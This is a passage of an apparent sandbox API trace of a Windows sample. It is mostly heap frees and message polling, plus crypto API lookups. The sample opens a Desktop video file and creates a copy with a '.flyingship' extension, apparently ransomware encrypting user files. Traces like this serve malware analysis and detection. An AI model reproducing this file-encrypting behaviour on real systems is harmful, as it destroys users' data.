lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0168.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0168.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.390] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.391] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.391] CryptDestroyHash (hHash=0x90ae18) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0168.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y8qf6zl.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.396] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.397] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y8qf6zl.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 